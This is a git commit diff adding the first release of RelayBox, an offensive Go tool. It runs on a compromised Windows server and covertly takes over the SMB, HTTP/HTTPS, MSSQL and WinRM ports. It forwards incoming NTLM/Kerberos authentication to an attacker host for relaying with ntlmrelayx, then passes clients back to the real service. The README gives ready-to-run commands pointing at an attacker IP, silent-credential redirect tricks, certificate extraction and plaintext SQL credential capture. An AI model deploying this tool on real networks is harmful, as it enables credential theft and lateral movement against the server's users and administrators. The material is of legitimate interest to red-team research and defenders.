First release version

Author: Splinter0

.gitignore

@@ -0,0 +1 @@
+relaybox.exe

README.md

@@ -0,0 +1,143 @@
+# RelayBox - Man-In-The-Service tool to turn servers against their admins
+
+RelayBox is a tool that allows Red Teamers to silently place themselves in-between legitimate Windows servers without disrupting the latter. Its main purpose is to be able to, from a compromised server running the tool, relay incoming authentication attempts to other resources in the network without arising any suspicion.
+
+**Must be used with:** ntlmrelayx (https://github.com/fortra/impacket) or krbrelayx (https://github.com/dirkjanm/krbrelayx)
+
+## Building
+
+The project now follows the conventional `cmd/` + `pkg/` layout. Build the binary with:
+
+```bash
+GOOS=windows go build -o relaybox.exe ./cmd/relaybox
+```
+
+You can also find prebuilt binaries on the Releases page.
+
+## Why?
+
+NTLM and Kerberos relaying attacks are really powerful, however often times can be impractical, too noisy or too disruptive. This is because at times it is not enough to (or we simply aren't able to):
+- Poison name resolution
+- Exploit RPC functions to coerce machine accounts
+- Deliver user coercion payloads
+
+Additionally, **oftentimes the best relay point** (the machine we control and "harvest" auth attempts from) **is a server that is used by many users**. The logic is quite clear, more users making connections to a machine `==` more authentication attemps `==` higher chance to get the accounts we need.
+
+SpecterOps published a method to take over port 445 in their [Relay You Heart Away](https://www.x33fcon.com/slides/x33fcon24_-_Nick_Powers_-_Relay_Your_Heart_Away_An_OPSEC-Conscious_Approach_to_445_Takeover.pdf) talk. This research was amazing, however there is a clear issue with this: if we want the best relay vantage point, a busy file server is the best target, if we kill SMB everybody will notice and we will be disrupting pontentially critical processes.
+
+Also, why stop and SMB? Let's see if we can take over all Windows services, silently!
+
+## How it works
+
+Each protocol has its own module that achieves the following:
+- Rebind legitimate service to only local loopback
+- Start our own service on original port on all other interfaces
+- Create firewall rule for it
+- Upon user connection proxy everything to a remote host (this will be the one running `ntlmrelayx` and such)
+- Kill the connection
+- Upon re-connection (most clients for these services will auto-reconnect) proxy everything to legitimate service running on local loopback
+
+If you want more details about how this is achieved for each different service, checkout the "Services" section. 
+
+## Usage
+
+**This tool requires and is really only useful with local-admin privileges**
+
+```
+Usage of C:\tmp\relaybox.exe:
+  -http
+        Enable HTTP relay
+  -iface string
+        Specific interface to bind rogue to, defaults to all interfaces
+  -mssql
+        Enable MSSQL relay
+  -pfx string
+        File path of PFX file to run HTTPS proxy
+  -pfx-pass string
+        Password of PFX file to run HTTPS proxy
+  -raddr string
+        Remote host to forward to (will match port bound for rogue service)
+  -smb
+        Enable SMB relay
+  -verbose
+        Enable verbose logging
+  -winapi
+        Use Windows API to shut down smb service, default will kill with powershell command
+  -winrm
+        Enable WinRM relay
+  -mssql-smb
+        Enable MSSQL relay via named pipes, will also run smb proxy
+```
+
+Remember `-raddr` should be an attacker controlled machine running `ntlmrelayx.py`, this means that either that machine has direct network access to the relay targets, or you need to setup socks proxying between your attacker machine and the compromised server. Some tools to achieve this:
+- https://github.com/jpillora/chisel
+- https://github.com/Nicocha30/ligolo-ng
+
+### Take over SMB
+
+```bash
+./relaybox.exe -raddr 10.10.14.11 -smb
+```
+
+This will take over port 445 on all interfaces except localhost. Whenever a new client connects, the authentication phase gets proxied to `raddr`, then the connection is dropped. Once the client re-connects it will be proxied to the original SMB service running on localhost.
+
+### Take over MSSQL via named pipes
+
+```bash
+./relaybox.exe -raddr 10.10.14.11 -mssql-smb
+```
+
+This will hijack all incoming MSSQL connections to force them to use Named Pipes for communicating with the database. It will also enable the SMB takeover as if `-smb` would be running. This will result in all incoming MSSQL connection to be transparently man-in-the-middled and available for relay from your `-raddr`.
+
+### Take over HTTP
+
+```bash
+./relaybox.exe -raddr 10.10.14.11 -http
+```
+
+This will rebind all IIS listeners to localhost, then setup an http server that:
+- Upon first connection redirects to the dotless version of the hostname (http://website.domain.local -> http://website) so that domain credentials are sent without showing a popup to the user.
+- After redirection the NTLM challenge response is proxied to the `-raddr`
+- A cookie `AuthProxy` is set so that redirection will not happen again
+- Victim is taken back to the original page they visited
+This allows to transparently relay a victim visiting a site to LDAP or another HTTP server on the network.
+
+### Take over HTTPS
+
+```bash
+./relaybox.exe -raddr 10.10.14.11 -http -pfx server.pfx -pfx-pass '1234'
+```
+
+This behaves exactly like the HTTP takeover, except it will use a provided PFX file and password to create an HTTPS version of the attack as well. You whould extract the PFX from the compromised server so that it is as legitimate as possible. You can find a powershell utility to do this in: [http/export-pfx.ps1](http/export-pfx.ps1).
+
+### Take over MSSQL (experimental)
+
+```bash
+./relaybox.exe -raddr 10.10.14.11 -mssql
+```
+
+This will actually take over port 1433 and rebind the MSSQL service to run only on localhost. Just like with the SMB takeover, the first connection from a client will be proxied to the `-raddr` and can be used for relay, then the proxy will point to the legitimate MSSQL service running on localhost.
+
+This is marked as experimental because the exact number of connections before stopping to relay isn't yet clear for most MSSQL clients, and because MSSQL->MSSQL relaying is not yet a thing even in ntlmrelayx (https://github.com/fortra/impacket/issues/816).
+
+**Note** this is really good for capturing plaintext credentials when clients are doing SQL auth.
+
+### Take over WINRM
+
+```bash
+./relaybox.exe -raddr 10.10.14.11 -winrm
+```
+
+This will take over port 5985, using this will affect IIS services as well, so you should probably run this with `-http` as well if an HTTP service is exposed on the compromised server. This will proxy the first connection to the `-raddr` and then to the legitimate service running on localhost. 
+
+WinRM is not a really good candidate for relaying as there are a lot of pre-conditions for the target to be vulnerable: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./ . However, nothing's sopping you from capturing all traffic for a nice network based WinRM keylogger... until someone figures out WinRM relaying properly. 
+
+## TODO
+
+- MSSQL both named pipe and tcp server mitm simultaneously
+- RPC implementation to take over port 135
+- Add built-in name resolution poisoning
+- Implement all system calls via Windows API instead of Powershell
+- Auto detect and extract .pfx for HTTPS takeover
+- Investigate ADFS relaying: https://www.praetorian.com/blog/relaying-to-adfs-attacks/
+- Perhpas take inspiration for more HTTP implementations from: https://github.com/praetorian-inc/ADFSRelay

cmd/relaybox/main.go

@@ -0,0 +1,46 @@
+package main
+
+import (
+	"context"
+	"flag"
+	"log"
+	"os"
+	"os/signal"
+	"relaybox/pkg/app"
+	"relaybox/pkg/config"
+	"syscall"
+)
+
+func main() {
+	var cfg config.Config
+
+	flag.BoolVar(&cfg.EnableSMB, "smb", false, "Enable SMB relay")
+	flag.BoolVar(&cfg.UseWinAPI, "winapi", false, "Use Windows API to shut down smb service, default will kill with powershell command")
+	flag.BoolVar(&cfg.EnableHTTP, "http", false, "Enable HTTP relay")
+	flag.BoolVar(&cfg.EnableWinRM, "winrm", false, "Enable WinRM relay")
+	flag.BoolVar(&cfg.EnableMSSQL, "mssql", false, "Enable MSSQL relay")
+	flag.BoolVar(&cfg.EnableMSSQLNamedPipe, "mssql-smb", false, "Enable MSSQL relay via named pipes, will also run smb proxy")
+	flag.StringVar(&cfg.Interface, "iface", "", "Specific interface to bind rogue to, defaults to all interfaces")
+	flag.StringVar(&cfg.RemoteAddr, "raddr", "", "Remote host to forward to (will match port bound for rogue service)")
+	flag.BoolVar(&cfg.Verbose, "verbose", false, "Enable verbose logging")
+	flag.StringVar(&cfg.PFXPath, "pfx", "", "File path of PFX file to run HTTPS proxy")
+	flag.StringVar(&cfg.PFXPass, "pfx-pass", "", "Password of PFX file to run HTTPS proxy")
+	flag.Parse()
+
+	if cfg.RemoteAddr == "" {
+		flag.Usage()
+		os.Exit(1)
+	}
+
+	exePath, err := os.Executable()
+	if err != nil {
+		log.Fatalf("Error getting executable path: %v", err)
+	}
+
+	ctx, stop := signal.NotifyContext(context.Background(), os.Interrupt, syscall.SIGTERM)
+	defer stop()
+
+	if err := app.Run(ctx, exePath, cfg); err != nil {
+		log.Fatal(err)
+	}
+}

go.mod

@@ -0,0 +1,8 @@
+module relaybox
+
+go 1.24.0
+
+require (
+	golang.org/x/crypto v0.43.0
+	golang.org/x/sys v0.37.0
+)

go.sum

@@ -0,0 +1,4 @@
+golang.org/x/crypto v0.43.0 h1:dduJYIi3A3KOfdGOHX8AVZ/jGiyPa3IbBozJ5kNuE04=
+golang.org/x/crypto v0.43.0/go.mod h1:BFbav4mRNlXJL4wNeejLpWxB7wMbc79PdRGhWKncxR0=
+golang.org/x/sys v0.37.0 h1:fdNQudmxPjkdUTPnLn5mdQv7Zwvbvpaxqs831goi9kQ=
+golang.org/x/sys v0.37.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=

pkg/app/app.go

@@ -0,0 +1,119 @@
+package app
+
+import (
+	"context"
+	"fmt"
+	"log"
+	"os"
+
+	"relaybox/pkg/config"
+	"relaybox/pkg/services/httprelay"
+	"relaybox/pkg/services/mssql"
+	"relaybox/pkg/services/smb"
+	"relaybox/pkg/services/winrm"
+	"relaybox/pkg/system/network"
+)
+
+type Service interface {
+	GetPort() string
+	GetServiceName() string
+	Start() int
+	Stop()
+}
+
+// Run wires up relay services based on the provided configuration and blocks until ctx is canceled.
+func Run(ctx context.Context, exePath string, cfg config.Config) error {
+	if cfg.RemoteAddr == "" {
+		return fmt.Errorf("remote address is required")
+	}
+
+	localAddrs, err := resolveAddresses(cfg)
+	if err != nil {
+		return err
+	}
+	if len(localAddrs) == 0 {
+		return fmt.Errorf("no local addresses found")
+	}
+
+	services := buildServices(exePath, localAddrs, cfg)
+	if len(services) == 0 {
+		return fmt.Errorf("no services enabled")
+	}
+
+	log.Printf("Local addresses: %v", localAddrs)
+	log.Printf("Remote address: %s", cfg.RemoteAddr)
+
+	started := startServices(services)
+	if len(started) == 0 {
+		return fmt.Errorf("all services failed to start")
+	}
+
+	<-ctx.Done()
+	log.Println("Shutdown requested, stopping services...")
+	for _, svc := range started {
+		log.Printf("Stopping %s on %s", svc.GetServiceName(), svc.GetPort())
+		svc.Stop()
+	}
+	log.Println("Shutdown complete")
+	return nil
+}
+
+func resolveAddresses(cfg config.Config) ([]string, error) {
+	if cfg.Interface == "" {
+		return network.GetAllIPs()
+	}
+	addr, err := network.GetIPByInterface(cfg.Interface)
+	if err != nil {
+		return nil, err
+	}
+	return []string{addr}, nil
+}
+
+func buildServices(exePath string, localAddresses []string, cfg config.Config) []Service {
+	var services []Service
+
+	namedPipes := cfg.EnableMSSQLNamedPipe
+	enableSMB := cfg.EnableSMB || namedPipes
+
+	if namedPipes {
+		log.Println("MSSQL Named Pipe relay enabled")
+		services = append(services, mssql.NewMSSQL(exePath, localAddresses, cfg.RemoteAddr, true, cfg.Verbose))
+	}
+	if enableSMB {
+		log.Println("SMB relay enabled")
+		services = append(services, smb.NewSMB(exePath, localAddresses, cfg.RemoteAddr, cfg.UseWinAPI, cfg.Verbose))
+	}
+	if cfg.EnableHTTP {
+		log.Println("HTTP relay enabled")
+		hostname, err := os.Hostname()
+		if err != nil {
+			log.Println("Error getting hostname:", err)
+			hostname = ""
+		}
+		services = append(services, httprelay.NewHTTP(exePath, localAddresses, cfg.RemoteAddr, hostname, cfg.PFXPath, cfg.PFXPass, cfg.Verbose))
+	}
+	if cfg.EnableWinRM {
+		log.Println("WinRM relay enabled")
+		services = append(services, winrm.NewWinRM(exePath, localAddresses, cfg.RemoteAddr, cfg.Verbose))
+	}
+	if cfg.EnableMSSQL && !namedPipes {
+		log.Println("MSSQL relay enabled")
+		services = append(services, mssql.NewMSSQL(exePath, localAddresses, cfg.RemoteAddr, false, cfg.Verbose))
+	}
+	return services
+}
+
+func startServices(services []Service) []Service {
+	var started []Service
+	for _, service := range services {
+		log.Printf("Starting rogue %s on %s", service.GetServiceName(), service.GetPort())
+		if service.Start() == 1 {
+			service.Stop()
+			log.Printf("Failed to start %s on %s", service.GetServiceName(), service.GetPort())
+			continue
+		}
+		log.Printf("Started rogue %s on %s!", service.GetServiceName(), service.GetPort())
+		started = append(started, service)
+	}
+	return started
+}

pkg/config/config.go

@@ -0,0 +1,16 @@
+package config
+
+// Config captures CLI/runtime options for relaybox.
+type Config struct {
+	RemoteAddr           string
+	Interface            string
+	Verbose              bool
+	UseWinAPI            bool
+	PFXPath              string
+	PFXPass              string
+	EnableSMB            bool
+	EnableHTTP           bool
+	EnableWinRM          bool
+	EnableMSSQL          bool
+	EnableMSSQLNamedPipe bool
+}